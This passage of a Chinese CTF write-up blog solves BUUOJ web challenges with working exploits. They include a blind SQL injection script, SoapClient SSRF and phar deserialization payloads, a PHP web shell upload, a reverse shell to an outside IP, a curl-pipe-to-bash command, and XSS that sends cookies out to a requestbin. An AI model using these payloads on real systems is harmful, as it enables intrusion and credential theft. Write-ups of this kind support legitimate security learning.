&#39;(&#39;.preg_replace(&#39;&#x2F;&#96;([^&#96;,]+)&#96;&#x2F;&#39;,&#39;\&#39;$&#123;1&#125;\&#39;&#39;,$column).&#39;)&#39;;</span><br><span class="line">&#x2F;&#x2F;output</span><br><span class="line">&#96;a&#96;,&#96;b&#96;,&#96;c&#96;,sql)#&#96;,&#96;d&#96;</span><br><span class="line">( &#39;a&#39;,&#39;b&#39;,&#39;c&#39;,sql)#&#96;,&#39;d&#39; )</span><br></pre></td></tr></table></figure>

<p>获取admin密码脚本：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line">import time</span><br><span class="line">url &#x3D; &#39;http:&#x2F;&#x2F;cfa4fe25-3f41-4b51-94cc-ffb813030907.node3.buuoj.cn&#x2F;index.php?action&#x3D;publish&#39;</span><br><span class="line">cookies &#x3D; &#123;</span><br><span class="line">    &quot;PHPSESSID&quot;: &quot;609p5gi14cubaulus8h2vh3rj1&quot;   #先登陆，然后换cookie</span><br><span class="line">&#125;</span><br><span class="line">text&#x3D;&#39;&#39;</span><br><span class="line">for i in range(1,33):</span><br><span class="line">    l&#x3D;28</span><br><span class="line">    h&#x3D;126</span><br><span class="line">    while abs(h - l) &gt; 1:</span><br><span class="line">        mid&#x3D;(l+h)&#x2F;2</span><br><span class="line">        payload&#x3D;&#39;c&#96;,if(((ascii(mid((select password from ctf_users limit 1),&#123;&#125;,1)))&gt;&#123;&#125;),sleep(3),1))#&#39;</span><br><span class="line">        data&#x3D;&#123;</span><br><span class="line">            &#39;signature&#39;:payload.format(i,mid),</span><br><span class="line">            &#39;mood&#39;:0</span><br><span class="line">        &#125;</span><br><span class="line">        now_t&#x3D;time.time()</span><br><span class="line">        re&#x3D;requests.post(url,data&#x3D;data,cookies&#x3D;cookies)</span><br><span class="line">        #print(re.text)</span><br><span class="line">        if time.time()-now_t &gt; 3:</span><br><span class="line">            l&#x3D;mid</span><br><span class="line">        else:</span><br><span class="line">            h&#x3D;mid</span><br><span class="line">    mid_num &#x3D; int((l+h+1) &#x2F; 2)</span><br><span class="line">    text +&#x3D; chr(int(h))</span><br><span class="line">    print(text)</span><br></pre></td></tr></table></figure>

<ol start="3">
<li>得到MD5:c991707fdf339958eded91331fb11ba0,解得jaivypassword，尝试进行登录发现页面回显<code>You can only login at the usual address</code>，在源代码包全局搜索这一字符串，在user.php处找到</li>
</ol>
<p><img src="/2020/03/25/BUUOJ-web%E5%88%B7%E9%A2%98%EF%BC%88%E4%B8%89%EF%BC%89/image-20200327104310957.png" alt></p>
<p>分析代码可知$user的值来源于$ret</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">@$ret &#x3D; $db-&gt;select(array(&#39;id&#39;,&#39;username&#39;,&#39;ip&#39;,&#39;is_admin&#39;,&#39;allow_diff_ip&#39;),&#39;ctf_users&#39;,&quot;username &#x3D; &#39;$username&#39; and password &#x3D; &#39;$password&#39; limit 1&quot;);</span><br></pre></td></tr></table></figure>

<p>get_ip是由$_SERVER[’‘REMOTE_ADDR’]获得的，需要ssrf</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">function get_ip()&#123;</span><br><span class="line">    return $_SERVER[&#39;REMOTE_ADDR&#39;];</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>在use.php的showmess方法中找到反序列化函数</p>
<p><img src="/2020/03/25/BUUOJ-web%E5%88%B7%E9%A2%98%EF%BC%88%E4%B8%89%EF%BC%89/image-20200327222624765.png" alt></p>
<p>这里的row[2]，为上面select查询中的mood字段值。SSRF+反序列化，SSRF可用使用内置类Soapclient，并且下面还调用了一个getcountry的自定义方法，正好可用触发Soapclient::__call进行网络请求</p>
<p>新建一个窗口,替换payload中的cookie和爆破后的code</p>
<p><img src="/2020/03/25/BUUOJ-web%E5%88%B7%E9%A2%98%EF%BC%88%E4%B8%89%EF%BC%89/image-20200328000047237.png" alt></p>
<p>payload:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$target &#x3D; &quot;http:&#x2F;&#x2F;127.0.0.1&#x2F;index.php?action&#x3D;login&quot;;</span><br><span class="line">$post_string &#x3D; &#39;username&#x3D;admin&amp;password&#x3D;jaivypassword&amp;code&#x3D;113713&#39;;&#x2F;&#x2F;换code</span><br><span class="line">$headers &#x3D; array(</span><br><span class="line">    &#39;Cookie: PHPSESSID&#x3D;u1umj91lggqgj0ccibd81h3d91&#39;,&#x2F;&#x2F;换cookie</span><br><span class="line">);</span><br><span class="line">$b &#x3D; new SoapClient(null,array(&#39;location&#39; &#x3D;&gt; $target,&#39;user_agent&#39;&#x3D;&gt;&#39;w4nder^^Content-Type: application&#x2F;x-www-form-urlencoded^^&#39;.join(&#39;^^&#39;,$headers).&#39;^^Content-Length: &#39;. (string)strlen($post_string).&#39;^^^^&#39;.$post_string.&#39;^^&#39;,&#39;uri&#39;&#x3D;&gt;&#39;hello&#39;));</span><br><span class="line">$aaa &#x3D; serialize($b);</span><br><span class="line">$aaa &#x3D; str_replace(&#39;^^&#39;,&quot;\r\n&quot;,$aaa);</span><br><span class="line">echo &#39;0x&#39;.bin2hex($aaa);</span><br></pre></td></tr></table></figure>

<p>运行一下得到序列化的hex值，在之前登陆的test123账号上注入mood的值</p>
<p><img src="/2020/03/25/BUUOJ-web%E5%88%B7%E9%A2%98%EF%BC%88%E4%B8%89%EF%BC%89/image-20200328000906716.png" alt></p>
<p>用test123账号账号刷新一下<code>?action=index</code>的页面，触发发序列化，然后刷新新开的窗口页面发现publish变成了文件上传页面，这里我们之所以反序列化soap类后能登录admin，是因为</p>
<pre><code>$mood = unserialize($row[2]);
$country = $mood-&gt;getcountry();</code></pre><p>我们知道此时$mood就是一个soap类，所以这个类没有getcountry()方法，此时就会触发soap类的__call()魔法函数就能实现登录<br>上传一个小马，连接蚁剑，查看/etc/host，发现存在173.208.161.0/24的网段，逐个curl 扫描，发现173.208.161.10存活</p>
<p><img src="/2020/03/25/BUUOJ-web%E5%88%B7%E9%A2%98%EF%BC%88%E4%B8%89%EF%BC%89/BUUOJ-web%E5%88%B7%E9%A2%98%EF%BC%88%E4%B8%89%EF%BC%89%5Cimage-20200328002224576.png" alt></p>
<p>在burp中查看源代码进行分析</p>
<p><img src="/2020/03/25/BUUOJ-web%E5%88%B7%E9%A2%98%EF%BC%88%E4%B8%89%EF%BC%89/image-20200328002753590.png" alt></p>
<p>由于end会输出输入的最后一项值，如果$ext==$filename[count($filename) - 1]，die()，$filename可以直接传入，因此我们可以传个file[0]与file[1]，问题在于end()，end()返回数组最后一个元素，但并不是按照数组索引的顺序排列的，而是按照赋值顺序。也就是说我们传入file[1]=aaa,file[0]=bbb，文件名为bbb.aaa，end()返回的是bbb，第一个die就可以绕过了。</p>
<p><img src="https://img-blog.csdnimg.cn/20200306171314880.png" alt></p>
<p>上传源代码，用postman发包</p>
<p><img src="/2020/03/25/BUUOJ-web%E5%88%B7%E9%A2%98%EF%BC%88%E4%B8%89%EF%BC%89/image-20200328011427281.png" alt></p>
<p>用code功能转换成php_cURL代码，修改url和请求体</p>
<p><img src="/2020/03/25/BUUOJ-web%E5%88%B7%E9%A2%98%EF%BC%88%E4%B8%89%EF%BC%89/image-20200328012415117.png" alt></p>
<p>生成最终payload：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">$curl &#x3D; curl_init();</span><br><span class="line"></span><br><span class="line">curl_setopt_array($curl, array(</span><br><span class="line">  CURLOPT_URL &#x3D;&gt; &quot;http:&#x2F;&#x2F;173.184.57.10&quot;,</span><br><span class="line">  CURLOPT_RETURNTRANSFER &#x3D;&gt; true,</span><br><span class="line">  CURLOPT_ENCODING &#x3D;&gt; &quot;&quot;,</span><br><span class="line">  CURLOPT_MAXREDIRS &#x3D;&gt; 10,</span><br><span class="line">  CURLOPT_TIMEOUT &#x3D;&gt; 30,</span><br><span class="line">  CURLOPT_HTTP_VERSION &#x3D;&gt; CURL_HTTP_VERSION_1_1,</span><br><span class="line">  CURLOPT_CUSTOMREQUEST &#x3D;&gt; &quot;POST&quot;,</span><br><span class="line">  CURLOPT_POSTFIELDS &#x3D;&gt; &quot;------WebKitFormBoundary7MA4YWxkTrZu0gW\r\nContent-Disposition: form-data; name&#x3D;\&quot;file\&quot;; filename&#x3D;\&quot;shell.php\&quot;\r\nContent-Type: false\r\n\r\n@&lt;?php system(&#39;cat &#x2F;etc&#x2F;flag*&#39;);\r\n------WebKitFormBoundary7MA4YWxkTrZu0gW\r\nContent-Disposition: form-data; name&#x3D;\&quot;hello\&quot;\r\n\r\nshell.php\r\n------WebKitFormBoundary7MA4YWxkTrZu0gW\r\nContent-Disposition: form-data; name&#x3D;\&quot;file[2]\&quot;\r\n\r\n222\r\n------WebKitFormBoundary7MA4YWxkTrZu0gW\r\nContent-Disposition: form-data; name&#x3D;\&quot;file[1]\&quot;\r\n\r\n111\r\n------WebKitFormBoundary7MA4YWxkTrZu0gW\r\nContent-Disposition: form-data; name&#x3D;\&quot;file[0]\&quot;\r\n\r\n&#x2F;..&#x2F;shell.php\r\n------WebKitFormBoundary7MA4YWxkTrZu0gW--&quot;,</span><br><span class="line">  CURLOPT_HTTPHEADER &#x3D;&gt; array(</span><br><span class="line">    &quot;cache-control: no-cache&quot;,</span><br><span class="line">    &quot;content-type: multipart&#x2F;form-data; boundary&#x3D;----WebKitFormBoundary7MA4YWxkTrZu0gW&quot;,</span><br><span class="line">    &quot;postman-token: 09101c1a-04aa-7288-15ea-515cbc9c512b&quot;</span><br><span class="line">  ),</span><br><span class="line">));</span><br><span class="line"></span><br><span class="line">$response &#x3D; curl_exec($curl);</span><br><span class="line">$err &#x3D; curl_error($curl);</span><br><span class="line"></span><br><span class="line">curl_close($curl);</span><br><span class="line"></span><br><span class="line">if ($err) &#123;</span><br><span class="line">  echo &quot;cURL Error #:&quot; . $err;</span><br><span class="line">&#125; else &#123;</span><br><span class="line">  echo $response;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>上传访问得到flag：</p>
<p><img src="/2020/03/25/BUUOJ-web%E5%88%B7%E9%A2%98%EF%BC%88%E4%B8%89%EF%BC%89/image-20200328012625101.png" alt></p>
<p>最后吐槽一下容器经常会注册失败，需要销毁重启QAQ</p>
<p>参考链接：</p>
<blockquote>
<p><a href="https://blog.csdn.net/chasingin/article/details/104687766" target="_blank" rel="noopener">https://blog.csdn.net/chasingin/article/details/104687766</a></p>
<p><a href="https://github.com/De1ta-team/De1CTF2019/blob/master/writeup/web/ShellShellShell/README_zh.md" target="_blank" rel="noopener">https://github.com/De1ta-team/De1CTF2019/blob/master/writeup/web/ShellShellShell/README_zh.md</a></p>
<p><a href="https://blog.csdn.net/a3320315/article/details/104132751?depth_1-utm_source=distribute.pc_relevant.none-task&amp;utm_source=distribute.pc_relevant.none-task" target="_blank" rel="noopener">https://blog.csdn.net/a3320315/article/details/104132751?depth_1-utm_source=distribute.pc_relevant.none-task&amp;utm_source=distribute.pc_relevant.none-task</a></p>
</blockquote>
<h3 id="0x-03-SUCTF-2019-Upload-Labs-2"><a href="#0x-03-SUCTF-2019-Upload-Labs-2" class="headerlink" title="0x 03 [SUCTF 2019]Upload Labs 2"></a>0x 03 [SUCTF 2019]Upload Labs 2</h3><ul>
<li><p>考点</p>
<p>phar反序列化、SSRF</p>
</li>
<li><p>解题过程</p>
</li>
</ul>
<ol>
<li><p>首先根据题目提供的源代码进行审计，发现要获得flag必须本地访问admin.php，这里需要进行SSRF，这里将传递到admin.php的参数进行实例化了AD类，在这个类中，又通过反射类来实例一个对象，并通过该实例化的对象来调用反射出来的该类的方法</p>
<p><img src="/2020/03/25/BUUOJ-web%E5%88%B7%E9%A2%98%EF%BC%88%E4%B8%89%EF%BC%89/image-20200328115740615.png" alt></p>
<p>分析index.php代码发现它对上传的文件进行检查，检查图片的后缀和上传的内容中不能有<code>&lt;?</code>，这里我们可以用<code>&lt;script language=&#39;php&#39;&gt;</code>绕过。</p>
</li>
<li><p>分析func.php中的代码，对post请求的url参数进行匹配</p>
</li>
</ol>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">if(preg_match(&#39;&#x2F;^(ftp|zlib|data|glob|phar|ssh2|compress.bzip2|compress.zlib|rar|ogg|expect)(.|\\s)*|(.|\\s)*(file|data|\.\.)(.|\\s)*&#x2F;i&#39;,$_POST[&#39;url&#39;]))&#123;</span><br><span class="line">        die(&quot;Go away!&quot;);</span><br></pre></td></tr></table></figure>

<p><img src="/2020/03/25/BUUOJ-web%E5%88%B7%E9%A2%98%EF%BC%88%E4%B8%89%EF%BC%89/index.png" alt></p>
<p>这里过滤了过滤了类似<code>phar</code>之类的伪协议，但是可以通过 php://filter 来绕过一些开头限制进行 phar 反序列化。</p>
<p>这里会对上传的文件进行检查，返回文件类型，可能存在phar反序列化：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">$file_path &#x3D; $_POST[&#39;url&#39;];</span><br><span class="line">$file &#x3D; new File($file_path);</span><br><span class="line">$file-&gt;getMIME();</span><br><span class="line">echo &quot;&lt;p&gt;Your file type is &#39;$file&#39; &lt;&#x2F;p&gt;&quot;;</span><br></pre></td></tr></table></figure>

<p>跟进File类</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">class File&#123;</span><br><span class="line">...</span><br><span class="line">    function __wakeup()&#123;</span><br><span class="line">        &#x2F;&#x2F;调用反射创建类</span><br><span class="line">        $class &#x3D; new ReflectionClass($this-&gt;func);</span><br><span class="line">        &#x2F;&#x2F;创建实例</span><br><span class="line">        $a &#x3D; $class-&gt;newInstanceArgs($this-&gt;file_name);</span><br><span class="line">         &#x2F;&#x2F;触发SoapClient类的__call方法</span><br><span class="line">        $a-&gt;check();</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">    function getMIME()&#123;</span><br><span class="line">        $finfo &#x3D; finfo_open(FILEINFO_MIME_TYPE);</span><br><span class="line">        $this-&gt;type &#x3D; finfo_file($finfo, $this-&gt;file_name);</span><br><span class="line">        finfo_close($finfo);</span><br><span class="line">    &#125;</span><br><span class="line">...</span><br></pre></td></tr></table></figure>

<p>这里<code>$hits-&gt;func</code>可以被我们控制为<code>SoapClient</code>类，然后控制<code>$htis-&gt;file_name</code>去传入我们想要的参数。最后通过<code>$a-&gt;check();</code>调用<code>SoapClient::__call()</code>从而触发<code>SSRF</code></p>
<ol start="3">
<li>构造payload如下：</li>
</ol>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">class File</span><br><span class="line">&#123;</span><br><span class="line">    public $file_name &#x3D; &quot;&quot;;</span><br><span class="line">    public $func &#x3D; &quot;SoapClient&quot;;</span><br><span class="line"></span><br><span class="line">    function __construct()</span><br><span class="line">    &#123;</span><br><span class="line">        $target &#x3D; &quot;http:&#x2F;&#x2F;127.0.0.1&#x2F;admin.php&quot;;</span><br><span class="line">        &#x2F;&#x2F;需要更改其中curl 的ip</span><br><span class="line">        $post_string &#x3D; &#39;admin&#x3D;&amp;cmd&#x3D;curl 174.1.145.112&#x2F;index.php|bash&amp;clazz&#x3D;SplStack&amp;func1&#x3D;push&amp;func2&#x3D;push&amp;func3&#x3D;push&amp;arg1&#x3D;1111&amp;arg2&#x3D;1111&amp;arg3&#x3D;&#39; . &quot;\r\n&quot;;</span><br><span class="line">        $headers &#x3D; [];</span><br><span class="line">        $this-&gt;file_name &#x3D; [</span><br><span class="line">            null,</span><br><span class="line">            array(&#39;location&#39; &#x3D;&gt; $target,</span><br><span class="line">                &#39;user_agent&#39; &#x3D;&gt; str_replace(&#39;^^&#39;, &quot;\r\n&quot;, &#39;xxxxx^^Content-Type: application&#x2F;x-www-form-urlencoded^^&#39; . join(&#39;^^&#39;, $headers) . &#39;Content-Length: &#39; . (string)strlen($post_string) . &#39;^^^^&#39; . $post_string),</span><br><span class="line">                &#39;uri&#39; &#x3D;&gt; &#39;hello&#39;)</span><br><span class="line">        ];</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$phar &#x3D; new Phar(&#39;test.phar&#39;);</span><br><span class="line">$phar-&gt;startBuffering();</span><br><span class="line">$phar-&gt;addFromString(&#39;test.txt&#39;, &#39;text&#39;);</span><br><span class="line">$phar-&gt;setStub(&#39;&lt;script language&#x3D;&quot;php&quot;&gt;__HALT_COMPILER();&lt;&#x2F;script&gt;&#39;);</span><br><span class="line">$object &#x3D; new File;</span><br><span class="line">echo urlencode(serialize($object));</span><br><span class="line">$phar-&gt;setMetadata($object);</span><br><span class="line">$phar-&gt;stopBuffering();</span><br><span class="line">rename(&#39;test.phar&#39;,&#39;lanxiaojun.jpg&#39;);</span><br></pre></td></tr></table></figure>

<p>运行生成了一个lanxiaojun.jpg文件并上传</p>
<p>是的</p>
<p><img src="/2020/03/25/BUUOJ-web%E5%88%B7%E9%A2%98%EF%BC%88%E4%B8%89%EF%BC%89/image-20200328113640002.png" alt></p>
<p>在linux下靶机的在<code>var/www/html/index.php</code>中写入弹shell的一句话，并开启监听</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">bash -i &gt;&amp; &#x2F;dev&#x2F;tcp&#x2F;174.1.145.112&#x2F;9999 0&gt;&amp;1</span><br></pre></td></tr></table></figure>

<p>在func.php页面触发反序列化</p>
<p><img src="/2020/03/25/BUUOJ-web%E5%88%B7%E9%A2%98%EF%BC%88%E4%B8%89%EF%BC%89/image-20200328120255257.png" alt></p>
<p>然后在靶机上收到反弹的shell获得flag。</p>
<p>除了可以反弹shell之外还可以发包带上请求的信息</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$post_string &#x3D; &#39;admin&#x3D;1&amp;cmd&#x3D;curl --referer &quot;&#96;&#x2F;readflag&#96;&quot; &quot;http:&#x2F;&#x2F;xss.buuoj.cn&#x2F;index.php?do&#x3D;api%26id&#x3D;72Jvrh&quot;&amp;clazz&#x3D;SplStack&amp;func1&#x3D;push&amp;func2&#x3D;push&amp;func3&#x3D;push&amp;arg1&#x3D;123456&amp;arg2&#x3D;123456&amp;arg3&#x3D;&#39;. &quot;\r\n&quot;;</span><br></pre></td></tr></table></figure>

<p>参考链接：</p>
<blockquote>
<p><a href="http://github.mrkaixin.computer/2020/03/16/BUU(三)/" target="_blank" rel="noopener">http://github.mrkaixin.computer/2020/03/16/BUU(%E4%B8%89)/</a></p>
<p><a href="https://www.jianshu.com/p/b97080cd7623" target="_blank" rel="noopener">https://www.jianshu.com/p/b97080cd7623</a></p>
</blockquote>
<h3 id="0x-04-GWCTF-2019-mypassword"><a href="#0x-04-GWCTF-2019-mypassword" class="headerlink" title="0x 04 [GWCTF 2019]mypassword"></a>0x 04 [GWCTF 2019]mypassword</h3><ul>
<li><p>考点</p>
<p>xss</p>
</li>
<li><p>解题过程</p>
</li>
</ul>
<ol>
<li>注册登录之后在feedback`页面看到了一个大大的输入框，查看源码如下：</li>
</ol>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">if(is_array($feedback))&#123;</span><br><span class="line">	echo &quot;&lt;script&gt;alert(&#39;反馈不合法&#39;);&lt;&#x2F;script&gt;&quot;;</span><br><span class="line">	return false;</span><br><span class="line">&#125;</span><br><span class="line">$blacklist &#x3D;[&#39;_&#39;,&#39;\&#39;&#39;,&#39;&amp;&#39;,&#39;\\&#39;,&#39;#&#39;,&#39;%&#39;,&#39;input&#39;,&#39;script&#39;,&#39;iframe&#39;,&#39;host&#39;,&#39;onload&#39;,&#39;onerror&#39;,&#39;srcdoc&#39;,&#39;location&#39;,&#39;svg&#39;,&#39;form&#39;,&#39;img&#39;,&#39;src&#39;,&#39;getElement&#39;,&#39;document&#39;,&#39;cookie&#39;];</span><br><span class="line">foreach ($blacklist as $val) &#123;</span><br><span class="line">	while(true)&#123;</span><br><span class="line">		if(stripos($feedback,$val) !&#x3D;&#x3D; false)&#123;</span><br><span class="line">		    $feedback &#x3D; str_ireplace($val,&quot;&quot;,$feedback);</span><br><span class="line">		&#125;</span><br><span class="line">        else&#123;</span><br><span class="line">		    break;</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>本题存在<code>CSP</code>，不能注入外部的JS，那肯定就需要在内部JS上动手脚，逐个页面看源码，结果在登陆页面看到存在<code>login.js</code>，源码如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">if (document.cookie &amp;&amp; document.cookie !&#x3D; &#39;&#39;) &#123;</span><br><span class="line">	var cookies &#x3D; document.cookie.split(&#39;; &#39;);</span><br><span class="line">	var cookie &#x3D; &#123;&#125;;</span><br><span class="line">	for (var i &#x3D; 0; i &lt; cookies.length; i++) &#123;</span><br><span class="line">		var arr &#x3D; cookies[i].split(&#39;&#x3D;&#39;);</span><br><span class="line">		var key &#x3D; arr[0];</span><br><span class="line">		cookie[key] &#x3D; arr[1];</span><br><span class="line">	&#125;</span><br><span class="line">	if(typeof(cookie[&#39;user&#39;]) !&#x3D; &quot;undefined&quot; &amp;&amp; typeof(cookie[&#39;psw&#39;]) !&#x3D; &quot;undefined&quot;)&#123;</span><br><span class="line">		document.getElementsByName(&quot;username&quot;)[0].value &#x3D; cookie[&#39;user&#39;];</span><br><span class="line">		document.getElementsByName(&quot;password&quot;)[0].value &#x3D; cookie[&#39;psw&#39;];</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这里记住密码功能会从<code>Cookie</code>中取出用户名和密码并赋值给<code>username</code>和<code>password</code>，因此我们可以利用这个内部JS来构造payload进行XSS，这里我们可以用BUU的<a href="http://http.requestbin.buuoj.cn/" target="_blank" rel="noopener">requestbin</a>来接受反馈。（RequestBin提供了一个URL，该URL将收集对其发出的请求）</p>
<p>在<code>feedback</code>页面构造如下payload提交：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">&lt;inpcookieut type&#x3D;&quot;text&quot; name&#x3D;&quot;username&quot;&gt;&lt;&#x2F;inpcookieut&gt;</span><br><span class="line">&lt;inpcookieut type&#x3D;&quot;text&quot; name&#x3D;&quot;password&quot;&gt;&lt;&#x2F;inpcookieut&gt;</span><br><span class="line">&lt;scricookiept scookierc&#x3D;&quot;.&#x2F;js&#x2F;login.js&quot;&gt;&lt;&#x2F;scricookiept&gt;</span><br><span class="line">&lt;scricookiept&gt;</span><br><span class="line">	var uname &#x3D; documcookieent.getElemcookieentsByName(&quot;username&quot;)[0].value;</span><br><span class="line">	var passwd &#x3D; documcookieent.getElemcookieentsByName(&quot;password&quot;)[0].value;</span><br><span class="line">	var res &#x3D; uname + &quot; &quot; + passwd;</span><br><span class="line">	documcookieent.locacookietion&#x3D;&quot;http:&#x2F;&#x2F;http.requestbin.buuoj.cn&#x2F;1drzn1e1&#x2F;?a&#x3D;&quot;+res;</span><br><span class="line">&lt;&#x2F;scricookiept&gt;</span><br></pre></td></tr></table></figure>

<p>可在requestbin看到回显：</p>
<p><img src="/2020/03/25/BUUOJ-web%E5%88%B7%E9%A2%98%EF%BC%88%E4%B8%89%EF%BC%89/image-20200326224613793.png" alt></p>
<p>参考资料：</p>
<blockquote>
<p><a href="http://www.ggb0n.cool/2020/03/04/GWCTF2019复现/#题目分析-2" target="_blank" rel="noopener">http://www.ggb0n.cool/2020/03/04/GWCTF2019%E5%A4%8D%E7%8E%B0/#%E9%A2%98%E7%9B%AE%E5%88%86%E6%9E%90-2</a></p>
</blockquote>
<h3 id="0x-05-BSidesCF-2020-Had-a-bad-day"><a href="#0x-05-BSidesCF-2020-Had-a-bad-day" class="headerlink" title="0x 05 [BSidesCF 2020]Had a bad day"></a>0x 05 [BSidesCF 2020]Had a bad day</h3><ul>
<li><p>考点</p>
<p>php伪协议</p>
</li>
<li><p>解题过程</p>
</li>
</ul>
<p>首页点击得到一张图片，根据url特性尝试base64读取源代码得到如下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">    $file &#x3D; $_GET[&#39;category&#39;];</span><br><span class="line"></span><br><span class="line">    if(isset($file))</span><br><span class="line">    &#123;</span><br><span class="line">        if( strpos( $file, &quot;woofers&quot; ) !&#x3D;&#x3D;  false || strpos( $file, &quot;meowers&quot; ) !&#x3D;&#x3D;  false || strpos( $file, &quot;index&quot;))&#123;</span><br><span class="line">            include ($file . &#39;.php&#39;);</span><br><span class="line">        &#125;</span><br><span class="line">        else&#123;</span><br><span class="line">            echo &quot;Sorry, we currently only support woofers and meowers.&quot;;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>必须含有woofers或meowers或index字符串,尝试首页包含一下看看<code>index.php?category=woofers/../flag</code></p>
<p><img src="/2020/03/25/BUUOJ-web%E5%88%B7%E9%A2%98%EF%BC%88%E4%B8%89%EF%BC%89/image-20200328013457364.png" alt></p>
<p>成功包含，接下来是读取源代码，这里有一个小技巧：php://filter伪协议可以套一层协议，这样提交的参数既包含有woofers这个字符串，也不会影响正常的包含</p>
